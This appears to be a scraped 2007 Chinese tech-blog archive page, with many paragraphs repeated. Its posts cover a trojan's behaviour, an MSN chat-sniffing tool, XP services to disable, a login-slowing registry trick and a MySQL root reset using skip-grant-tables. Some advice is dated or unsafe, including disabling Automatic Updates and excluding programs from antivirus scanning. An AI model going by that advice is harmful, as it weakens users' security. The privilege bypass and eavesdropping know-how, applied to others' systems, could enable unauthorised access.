病毒運(yùn)行后,在C盤program file以及windows目錄下生成winlogon.exe、regedit.com等14個(gè)病毒文件,病毒文件之多比較少見,,事實(shí)上這14個(gè)不同文件名的病毒文件系同一種文件,“落雪”之名亦可能由此而來。病毒文件名被模擬成正常的系統(tǒng)工具名稱,但是文件擴(kuò)展名變成了 .com。江民反病毒工程師分析,這是病毒利用了Windows操作系統(tǒng)執(zhí)行.com文件的優(yōu)先級比EXE文件高的特性,這樣,當(dāng)用戶調(diào)用系統(tǒng)配置文件Msconfig.exe的時(shí)候,一般習(xí)慣上輸入 Msconfig,而這是執(zhí)行的并不是微軟的Msconfig.exe程序,而是病毒文件 Msconfig.com ,病毒作者的“良苦用心”由此可見。病毒另一狡詐之處還有,病毒還創(chuàng)建一名為winlogon.exe的進(jìn)程,并把 winlogon.exe 的路徑指向c:\windows\winlogon.exe,而正常的系統(tǒng)進(jìn)程路徑是C:\WINDOWS\system32\ winlogon.exe,以此達(dá)到迷惑用戶的目的。
江民反病毒工程師介紹,除了在C盤下生成很多病毒文件外,病毒還修改注冊表文件關(guān)聯(lián),每當(dāng)用戶點(diǎn)擊html文件時(shí),都會運(yùn)行病毒。此外,病毒還在D盤下生成一個(gè)自動運(yùn)行批處理文件,這樣即使C盤目錄下的病毒文件被清除,當(dāng)用戶打開D盤時(shí),病毒仍然被激活運(yùn)行。這也是許多用戶反映病毒屢殺不絕的原因。
針對“落雪”病毒,江民殺毒軟件KV系列產(chǎn)品已及時(shí)升級,用戶只需升級病毒庫到最新狀態(tài)、開啟病毒實(shí)時(shí)監(jiān)控即可有效防殺該病毒,亦可使用江民未知病毒檢測功能處理該病毒。沒有安裝殺毒軟件的用戶,也可以下載使用江民“落雪”木馬專殺工具進(jìn)行殺毒,以免遭“落雪”病毒侵害。
江民“落雪”病毒專殺工具下載地址:
http://www.jiangmin.com/download/TrojanKiller.rar
邊聽邊唱 KuGoo MP3歌詞也能同步傳
[ 2007-03-25 02:34:55 | 作者: sun ]
現(xiàn)在幾乎所有的MP3播放器都支持歌詞同步功能,看著歌詞隨著音樂唱歌,簡直就是在K歌房飆歌。可是每次更換新的歌曲都要手動向MP3播放器內(nèi)拷貝歌詞文件,真是麻煩。如果你也和我一樣用KuGoo下載音樂,那么你有福了。
連接好MP3播放器后打開KuGoo主窗口,點(diǎn)擊頂端工具欄的“歌詞同步”標(biāo)簽按鈕,切換到歌曲同步窗口(如圖)。在這里會列出KuGoo的默認(rèn)播放列表,選中想要向MP3播放器復(fù)制的歌曲名稱并選中上面的“同步歌詞”復(fù)選框,然后點(diǎn)擊“開始同步”按鈕就可以輕松把歌曲和歌詞上傳到你的MP3播放器了。
連接好MP3播放器后打開KuGoo主窗口,點(diǎn)擊頂端工具欄的“歌詞同步”標(biāo)簽按鈕,切換到歌曲同步窗口(如圖)。在這里會列出KuGoo的默認(rèn)播放列表,選中想要向MP3播放器復(fù)制的歌曲名稱并選中上面的“同步歌詞”復(fù)選框,然后點(diǎn)擊“開始同步”按鈕就可以輕松把歌曲和歌詞上傳到你的MP3播放器了。
撥云見日見真相 揭開QQ運(yùn)行緩慢之謎
[ 2007-03-25 02:34:39 | 作者: sun ]
QQ升級到2006后,運(yùn)行速度越來越慢了,經(jīng)過筆者研究發(fā)現(xiàn)這可能和殺毒軟件有關(guān)。比如筆者用的是AntiVir,打開QQ時(shí),殺毒軟件的CPU占用率經(jīng)常在50%以上。無奈為了使QQ運(yùn)行流暢起來,對殺毒作了些設(shè)置。右擊系統(tǒng)托盤的AntiVir圖標(biāo),彈出菜單選擇“Configure AntiVir”。在打開的設(shè)置窗口展開“Scanner→Scan→Exceptions(例外)”,在右側(cè)窗格點(diǎn)擊“...”按鈕選擇QQ程序,最后點(diǎn)擊“Add”按鈕,點(diǎn)擊“確定”按鈕退出設(shè)置窗口即可解決QQ運(yùn)行緩慢的問題。
驚爆:普通人也能監(jiān)聽你MSN聊天
[ 2007-03-25 02:33:51 | 作者: sun ]
如果在安靜的辦公室突然誰大笑一聲,你可一定要注意了,有可能就是他正在監(jiān)聽你們大家的MSN聊天對話,雖然這可能僅僅只是一個(gè)玩笑,但描述的事實(shí)卻離我們越來越近。
在前不久的中國互聯(lián)網(wǎng)里,一場關(guān)于隱私保護(hù)的討論還沒有結(jié)束,MSN等即時(shí)通信軟件容易被老板監(jiān)聽的話題讓人對網(wǎng)絡(luò)聊天愛恨交加。而就在大家開始慢慢僥幸地認(rèn)為老板不會偷看MSN聊天記錄的同時(shí),另一個(gè)巨大MSN安全陷阱卻正在向用戶襲來。一個(gè)網(wǎng)友報(bào)料,稱最近這段時(shí)間一款叫“MSN Chat Monitor & Sniffer”的軟件在中國互聯(lián)網(wǎng)上悄然盛行,很多下載站點(diǎn)都提供有軟件的下載,只要下載安裝這個(gè)軟件,任何一個(gè)普普通通的人就能在網(wǎng)上監(jiān)聽本地局域網(wǎng)內(nèi)所有人的MSN聊天記錄。
“原來想到只有公司老板或網(wǎng)管員才能干的事情,沒想到現(xiàn)在所有人都能干了。以前也知道MSN可能被公司老板監(jiān)聽,但聊天中大不了不說老板壞話也就過去了,但現(xiàn)在真是人心惶惶,身邊每一個(gè)人都有可能看我MSN聊天情況,現(xiàn)在都不知道在網(wǎng)上聊天還敢說什么,以后都不敢用MSN了。”一個(gè)知名企業(yè)的白領(lǐng)在了解普通人也能監(jiān)聽MSN聊天的情況后反映非常激烈。
事實(shí)上情況可能遠(yuǎn)遠(yuǎn)比這個(gè)白領(lǐng)想到的更為嚴(yán)重,普通人使用“MSN Chat Monitor & Sniffer”軟件不僅可以輕松看到局域網(wǎng)內(nèi)部所有使用MSN人的MSN地址,而且能窺視到其中的聊天內(nèi)容,整個(gè)過程無需要網(wǎng)管的協(xié)助,也不需要在被監(jiān)聽的機(jī)器上裝任何的東西,要窺視同事的MSN聊天,只需花幾分鐘在自己的機(jī)器里操 作便可,所有局域網(wǎng)內(nèi)的MSN對話全部盡收眼底。現(xiàn)代社會,人人都幾乎離不開局域網(wǎng)中,上班在公司的局域網(wǎng)中,同事可以監(jiān)聽你,下班在家里的小區(qū)寬帶局域網(wǎng),隔壁鄰居可以監(jiān)聽你。你想想,這么多雙眼睛盯著你屏幕中的MSN,你還有聊天的欲望嗎?豈不說用MSN交流重要的信息,就連生活鎖事一類都得謹(jǐn)慎了。說不定,以前你在MSN中對隔壁女孩發(fā)送曖昧的語言,在MSN中告訴親友你的信用卡賬號密碼,在MSN中大說上司的壞話等等都可能已經(jīng)被其它同事看得一清二楚。
業(yè)界一個(gè)資深的網(wǎng)絡(luò)工程師告訴筆者,監(jiān)聽即時(shí)通信的軟件越來越成熟了,操作也變得非常便捷,以前可能相對于普通人要監(jiān)聽別人聊天,還需要一些網(wǎng)絡(luò)安全知識,而現(xiàn)在就應(yīng)用軟件幾個(gè)簡單的操作就能達(dá)到這個(gè)目的。同時(shí)這個(gè)網(wǎng)絡(luò)工程師告訴筆者,即使在安全度較高的網(wǎng)絡(luò)中,配合使用一個(gè)網(wǎng)關(guān)欺騙軟件,也能夠很方便地監(jiān)聽,特別是現(xiàn)在很多的小區(qū)寬帶,幾乎百分之百全部可以監(jiān)聽。
MSN之所以會出現(xiàn)這種信息不安全狀況,實(shí)際上主要在于MSN軟件消息傳輸方式的缺陷所致,由于MSN軟件是采用明文傳輸?shù)姆绞絹韨魉图磿r(shí)消息的,而這種傳輸方式不會經(jīng)過任何加密過程,非常容易被一些專門的監(jiān)聽軟件截取即時(shí)消息,MSN Chat Monitor & Sniffer就是這些監(jiān)聽軟件其中一種。
“MSN Chat Monitor & Sniffer”是國外開發(fā)的一款軟件,在它的官方網(wǎng)站上有它詳細(xì)的功能介紹,在功能說明稱此軟件不僅能實(shí)時(shí)在網(wǎng)絡(luò)中監(jiān)聽,即使當(dāng)你不在網(wǎng)絡(luò)時(shí),也可以設(shè)置自動監(jiān)聽并發(fā)送到你指定的郵箱里,在網(wǎng)站的幫助頁面里,還列舉了幾種特殊網(wǎng)絡(luò)結(jié)構(gòu)不能使用的解決辦法。此軟件在網(wǎng)站上以標(biāo)價(jià)59.95美元出售,不過國內(nèi)已有好事之徒將其破解漢化制作成了免費(fèi)中文版,而正是這個(gè)軟件中文版的出現(xiàn),才使其MSN監(jiān)聽迅速流行,直面沖擊著我們的工作和生活。
如果MSN不在很短的時(shí)間解決這個(gè)問題,人天生存在的偷窺欲望可能會促使MSN大眾偷窺時(shí)代的到來,偷窺的人越來越多,防止偷窺而放棄MSN也會不少,的或許有這么一天,監(jiān)聽的人超過超過使用MSN的人,那是一件多么有趣的事情啊。
在前不久的中國互聯(lián)網(wǎng)里,一場關(guān)于隱私保護(hù)的討論還沒有結(jié)束,MSN等即時(shí)通信軟件容易被老板監(jiān)聽的話題讓人對網(wǎng)絡(luò)聊天愛恨交加。而就在大家開始慢慢僥幸地認(rèn)為老板不會偷看MSN聊天記錄的同時(shí),另一個(gè)巨大MSN安全陷阱卻正在向用戶襲來。一個(gè)網(wǎng)友報(bào)料,稱最近這段時(shí)間一款叫“MSN Chat Monitor & Sniffer”的軟件在中國互聯(lián)網(wǎng)上悄然盛行,很多下載站點(diǎn)都提供有軟件的下載,只要下載安裝這個(gè)軟件,任何一個(gè)普普通通的人就能在網(wǎng)上監(jiān)聽本地局域網(wǎng)內(nèi)所有人的MSN聊天記錄。
“原來想到只有公司老板或網(wǎng)管員才能干的事情,沒想到現(xiàn)在所有人都能干了。以前也知道MSN可能被公司老板監(jiān)聽,但聊天中大不了不說老板壞話也就過去了,但現(xiàn)在真是人心惶惶,身邊每一個(gè)人都有可能看我MSN聊天情況,現(xiàn)在都不知道在網(wǎng)上聊天還敢說什么,以后都不敢用MSN了。”一個(gè)知名企業(yè)的白領(lǐng)在了解普通人也能監(jiān)聽MSN聊天的情況后反映非常激烈。
事實(shí)上情況可能遠(yuǎn)遠(yuǎn)比這個(gè)白領(lǐng)想到的更為嚴(yán)重,普通人使用“MSN Chat Monitor & Sniffer”軟件不僅可以輕松看到局域網(wǎng)內(nèi)部所有使用MSN人的MSN地址,而且能窺視到其中的聊天內(nèi)容,整個(gè)過程無需要網(wǎng)管的協(xié)助,也不需要在被監(jiān)聽的機(jī)器上裝任何的東西,要窺視同事的MSN聊天,只需花幾分鐘在自己的機(jī)器里操 作便可,所有局域網(wǎng)內(nèi)的MSN對話全部盡收眼底。現(xiàn)代社會,人人都幾乎離不開局域網(wǎng)中,上班在公司的局域網(wǎng)中,同事可以監(jiān)聽你,下班在家里的小區(qū)寬帶局域網(wǎng),隔壁鄰居可以監(jiān)聽你。你想想,這么多雙眼睛盯著你屏幕中的MSN,你還有聊天的欲望嗎?豈不說用MSN交流重要的信息,就連生活鎖事一類都得謹(jǐn)慎了。說不定,以前你在MSN中對隔壁女孩發(fā)送曖昧的語言,在MSN中告訴親友你的信用卡賬號密碼,在MSN中大說上司的壞話等等都可能已經(jīng)被其它同事看得一清二楚。
業(yè)界一個(gè)資深的網(wǎng)絡(luò)工程師告訴筆者,監(jiān)聽即時(shí)通信的軟件越來越成熟了,操作也變得非常便捷,以前可能相對于普通人要監(jiān)聽別人聊天,還需要一些網(wǎng)絡(luò)安全知識,而現(xiàn)在就應(yīng)用軟件幾個(gè)簡單的操作就能達(dá)到這個(gè)目的。同時(shí)這個(gè)網(wǎng)絡(luò)工程師告訴筆者,即使在安全度較高的網(wǎng)絡(luò)中,配合使用一個(gè)網(wǎng)關(guān)欺騙軟件,也能夠很方便地監(jiān)聽,特別是現(xiàn)在很多的小區(qū)寬帶,幾乎百分之百全部可以監(jiān)聽。
MSN之所以會出現(xiàn)這種信息不安全狀況,實(shí)際上主要在于MSN軟件消息傳輸方式的缺陷所致,由于MSN軟件是采用明文傳輸?shù)姆绞絹韨魉图磿r(shí)消息的,而這種傳輸方式不會經(jīng)過任何加密過程,非常容易被一些專門的監(jiān)聽軟件截取即時(shí)消息,MSN Chat Monitor & Sniffer就是這些監(jiān)聽軟件其中一種。
“MSN Chat Monitor & Sniffer”是國外開發(fā)的一款軟件,在它的官方網(wǎng)站上有它詳細(xì)的功能介紹,在功能說明稱此軟件不僅能實(shí)時(shí)在網(wǎng)絡(luò)中監(jiān)聽,即使當(dāng)你不在網(wǎng)絡(luò)時(shí),也可以設(shè)置自動監(jiān)聽并發(fā)送到你指定的郵箱里,在網(wǎng)站的幫助頁面里,還列舉了幾種特殊網(wǎng)絡(luò)結(jié)構(gòu)不能使用的解決辦法。此軟件在網(wǎng)站上以標(biāo)價(jià)59.95美元出售,不過國內(nèi)已有好事之徒將其破解漢化制作成了免費(fèi)中文版,而正是這個(gè)軟件中文版的出現(xiàn),才使其MSN監(jiān)聽迅速流行,直面沖擊著我們的工作和生活。
如果MSN不在很短的時(shí)間解決這個(gè)問題,人天生存在的偷窺欲望可能會促使MSN大眾偷窺時(shí)代的到來,偷窺的人越來越多,防止偷窺而放棄MSN也會不少,的或許有這么一天,監(jiān)聽的人超過超過使用MSN的人,那是一件多么有趣的事情啊。
winxp系統(tǒng)中可以被禁用的服務(wù)對照表
[ 2007-03-25 02:33:35 | 作者: sun ]
application layer gateway service
為internet連接共享和internet連接防火墻提供第三方協(xié)議插件的支持。如果你沒啟用internet連接共享或windows xp內(nèi)置防火墻,可以禁止這個(gè)服務(wù)。
automatic updates
自動從windows update啟用windows更新的下載和安裝。需要時(shí),我們完全可以在windows update web網(wǎng)站手動進(jìn)行更新。
clipbook
啟用“剪貼板查看器”儲存信息并與遠(yuǎn)程計(jì)算機(jī)共享。如果你沒有使用windows xp的遠(yuǎn)程桌面功能,那么可以禁止該服務(wù)。
error reporting service
服務(wù)和應(yīng)用程序在非標(biāo)準(zhǔn)環(huán)境下運(yùn)行時(shí)允許錯(cuò)誤報(bào)告。這個(gè)錯(cuò)誤報(bào)告對大多數(shù)人來說是沒用的,所以說我們可以禁止這項(xiàng)服務(wù)。
fast user switching compatibility
為在多用戶下需要協(xié)助的應(yīng)用程序提供管理。windows xp允許在一臺電腦上進(jìn)行多用戶之間的快速切換,如果使用不到,完全可以禁止該服務(wù)。
imapi cd-burning com service
用imapi管理cd錄制。如果你有專業(yè)的刻錄軟件,或者根本就沒有刻錄機(jī)的話,那么可以禁止該服務(wù)。
indexing service
本地和遠(yuǎn)程計(jì)算機(jī)上文件的索引內(nèi)容和屬性,提供文件快速訪問。這項(xiàng)服務(wù)對個(gè)人用戶沒有多大用處,而啟用后往往會占用很多cpu資源,所以禁止!
print spooler
將文件加載到內(nèi)存中以便遲后打印。如果你沒裝打印機(jī),完全可以禁用這個(gè)服務(wù)。
remote registry
使遠(yuǎn)程用戶能修改此計(jì)算機(jī)上的注冊表設(shè)置。這項(xiàng)非禁止不可,因?yàn)椴坏珎€(gè)人用戶用不到,而且有些居心不良的人還可以通過這個(gè)服務(wù)把你的瀏
覽器或系統(tǒng)改得面目全非。
smart card
管理計(jì)算機(jī)對智能卡的取讀訪問。智能卡?你有嗎?
ssdp discovery service
啟動家庭網(wǎng)絡(luò)上的upnp設(shè)備的發(fā)現(xiàn)。具有upnp的設(shè)備還不多,對于我們來說這個(gè)服務(wù)是沒有用的,禁止吧。
terminal services
允許多位用戶連接并控制一臺機(jī)器,并且在遠(yuǎn)程計(jì)算機(jī)上顯示桌面和應(yīng)用程序。如果你用到xp的遠(yuǎn)程控制功能,那么就需要保留該服務(wù),否則可以禁止它。
uninterruptible power supply
管理連接到計(jì)算機(jī)的不間斷電源。如果你有那種可以和計(jì)算機(jī)進(jìn)行數(shù)字通訊的ups電源的話,那么就需要這個(gè)服務(wù),沒有的話就禁止。
為internet連接共享和internet連接防火墻提供第三方協(xié)議插件的支持。如果你沒啟用internet連接共享或windows xp內(nèi)置防火墻,可以禁止這個(gè)服務(wù)。
automatic updates
自動從windows update啟用windows更新的下載和安裝。需要時(shí),我們完全可以在windows update web網(wǎng)站手動進(jìn)行更新。
clipbook
啟用“剪貼板查看器”儲存信息并與遠(yuǎn)程計(jì)算機(jī)共享。如果你沒有使用windows xp的遠(yuǎn)程桌面功能,那么可以禁止該服務(wù)。
error reporting service
服務(wù)和應(yīng)用程序在非標(biāo)準(zhǔn)環(huán)境下運(yùn)行時(shí)允許錯(cuò)誤報(bào)告。這個(gè)錯(cuò)誤報(bào)告對大多數(shù)人來說是沒用的,所以說我們可以禁止這項(xiàng)服務(wù)。
fast user switching compatibility
為在多用戶下需要協(xié)助的應(yīng)用程序提供管理。windows xp允許在一臺電腦上進(jìn)行多用戶之間的快速切換,如果使用不到,完全可以禁止該服務(wù)。
imapi cd-burning com service
用imapi管理cd錄制。如果你有專業(yè)的刻錄軟件,或者根本就沒有刻錄機(jī)的話,那么可以禁止該服務(wù)。
indexing service
本地和遠(yuǎn)程計(jì)算機(jī)上文件的索引內(nèi)容和屬性,提供文件快速訪問。這項(xiàng)服務(wù)對個(gè)人用戶沒有多大用處,而啟用后往往會占用很多cpu資源,所以禁止!
print spooler
將文件加載到內(nèi)存中以便遲后打印。如果你沒裝打印機(jī),完全可以禁用這個(gè)服務(wù)。
remote registry
使遠(yuǎn)程用戶能修改此計(jì)算機(jī)上的注冊表設(shè)置。這項(xiàng)非禁止不可,因?yàn)椴坏珎€(gè)人用戶用不到,而且有些居心不良的人還可以通過這個(gè)服務(wù)把你的瀏
覽器或系統(tǒng)改得面目全非。
smart card
管理計(jì)算機(jī)對智能卡的取讀訪問。智能卡?你有嗎?
ssdp discovery service
啟動家庭網(wǎng)絡(luò)上的upnp設(shè)備的發(fā)現(xiàn)。具有upnp的設(shè)備還不多,對于我們來說這個(gè)服務(wù)是沒有用的,禁止吧。
terminal services
允許多位用戶連接并控制一臺機(jī)器,并且在遠(yuǎn)程計(jì)算機(jī)上顯示桌面和應(yīng)用程序。如果你用到xp的遠(yuǎn)程控制功能,那么就需要保留該服務(wù),否則可以禁止它。
uninterruptible power supply
管理連接到計(jì)算機(jī)的不間斷電源。如果你有那種可以和計(jì)算機(jī)進(jìn)行數(shù)字通訊的ups電源的話,那么就需要這個(gè)服務(wù),沒有的話就禁止。
看我加強(qiáng)Windows系統(tǒng)安全之另類怪招
[ 2007-03-25 02:33:13 | 作者: sun ]
Windows 2000曾經(jīng)有一個(gè)著名的輸入法漏洞,可以借助中文輸入法跳進(jìn)系統(tǒng)。這個(gè)漏洞可以通過按裝SP1以上補(bǔ)丁包解決。在下載補(bǔ)丁程序的時(shí)候,我意外發(fā)現(xiàn)了一個(gè)另類加強(qiáng)系統(tǒng)安全的方法,還可以實(shí)現(xiàn)某些特別效果,不愿獨(dú)占,拿出來與大家共同分享。
意想不到的最終效果
先說一下最后效果,在Windows 2000登錄畫面出現(xiàn),提示按“Ctrl+Alt+Del”時(shí),正常按住這三個(gè)鍵進(jìn)行登錄,Windows 2000卻置之不理,按其他鍵也是如此,鍵盤沒有任何效果正常的“敲”鍵盤是不行的,需要按住幾秒,才會出現(xiàn)盼望的輸入密碼框,輸入密碼和用戶名也是如此,但進(jìn)入系統(tǒng)后就一切可正常操作了,不明白的還以為鍵盤出了毛病,這樣因?yàn)闊o法正常的操作鍵盤(將其操作速度放緩),就一定程度上降低了別人進(jìn)入系統(tǒng)的可能性 。
實(shí)現(xiàn)方法
第一步:在“開始→運(yùn)行”中輸入“regedt32”,選擇根鍵是[HKEY_USERS]的視窗,將[.default\control panel\Accessibility\keyboard preference]中“ON”的數(shù)據(jù)改為1。
第二步:將[.default\control panel\Accessibility\keyboard response]的“flags”數(shù)據(jù)改為127。
第三步:好了,該看一下效果了。注銷系統(tǒng),按“Ctrl+Alt+Del”或輸入密碼鍵盤是不是不像以前那么聽話了,鍵盤好像失靈一樣,機(jī)箱喇叭在狂叫,怎么辦?需要先按住“Ctrl”不放,待系統(tǒng)發(fā)出蜂鳴后在按“Alt”再待系統(tǒng)發(fā)出蜂鳴后,再按住“Del”,此時(shí)可以輸入密碼了。
第四步:下一步是輸入密碼。注意鍵盤上的鍵反應(yīng)速度都降低了,要輸入任何鍵,都需要按住它幾秒鐘才會顯示出來,回車鍵也是這樣的。
登錄系統(tǒng)之后,用鍵盤輸入文字的速度沒有變化,恢復(fù)到了正常速度。用了這個(gè)技巧,那些企圖進(jìn)入系統(tǒng)的人可能會誤認(rèn)為系統(tǒng)或鍵盤出了毛病而走開,給我們的系統(tǒng)又加了一把“鎖”。
意想不到的最終效果
先說一下最后效果,在Windows 2000登錄畫面出現(xiàn),提示按“Ctrl+Alt+Del”時(shí),正常按住這三個(gè)鍵進(jìn)行登錄,Windows 2000卻置之不理,按其他鍵也是如此,鍵盤沒有任何效果正常的“敲”鍵盤是不行的,需要按住幾秒,才會出現(xiàn)盼望的輸入密碼框,輸入密碼和用戶名也是如此,但進(jìn)入系統(tǒng)后就一切可正常操作了,不明白的還以為鍵盤出了毛病,這樣因?yàn)闊o法正常的操作鍵盤(將其操作速度放緩),就一定程度上降低了別人進(jìn)入系統(tǒng)的可能性 。
實(shí)現(xiàn)方法
第一步:在“開始→運(yùn)行”中輸入“regedt32”,選擇根鍵是[HKEY_USERS]的視窗,將[.default\control panel\Accessibility\keyboard preference]中“ON”的數(shù)據(jù)改為1。
第二步:將[.default\control panel\Accessibility\keyboard response]的“flags”數(shù)據(jù)改為127。
第三步:好了,該看一下效果了。注銷系統(tǒng),按“Ctrl+Alt+Del”或輸入密碼鍵盤是不是不像以前那么聽話了,鍵盤好像失靈一樣,機(jī)箱喇叭在狂叫,怎么辦?需要先按住“Ctrl”不放,待系統(tǒng)發(fā)出蜂鳴后在按“Alt”再待系統(tǒng)發(fā)出蜂鳴后,再按住“Del”,此時(shí)可以輸入密碼了。
第四步:下一步是輸入密碼。注意鍵盤上的鍵反應(yīng)速度都降低了,要輸入任何鍵,都需要按住它幾秒鐘才會顯示出來,回車鍵也是這樣的。
登錄系統(tǒng)之后,用鍵盤輸入文字的速度沒有變化,恢復(fù)到了正常速度。用了這個(gè)技巧,那些企圖進(jìn)入系統(tǒng)的人可能會誤認(rèn)為系統(tǒng)或鍵盤出了毛病而走開,給我們的系統(tǒng)又加了一把“鎖”。
如何修改遺失的MYSQL ROOT用戶密碼
[ 2007-03-25 02:32:57 | 作者: sun ]
如果忘記了 MySQL 的 root 密碼,可以用以下方法重新設(shè)置:
1. KILL掉系統(tǒng)里的MySQL進(jìn)程;
2. 用以下命令啟動MySQL,以不檢查權(quán)限的方式啟動;
mysqld_safe -skip-grant-tables &
3. 然后用空密碼方式使用root用戶登錄 MySQL;
mysql -u root
4. 修改root用戶的密碼;
mysql> update mysql.user set password=PASSWORD(’新密碼’) where User=’root’;
mysql> flush privileges;
mysql> quit
5. 重新啟動MySQL,就可以使用新密碼登錄了。
1. KILL掉系統(tǒng)里的MySQL進(jìn)程;
2. 用以下命令啟動MySQL,以不檢查權(quán)限的方式啟動;
mysqld_safe -skip-grant-tables &
3. 然后用空密碼方式使用root用戶登錄 MySQL;
mysql -u root
4. 修改root用戶的密碼;
mysql> update mysql.user set password=PASSWORD(’新密碼’) where User=’root’;
mysql> flush privileges;
mysql> quit
5. 重新啟動MySQL,就可以使用新密碼登錄了。
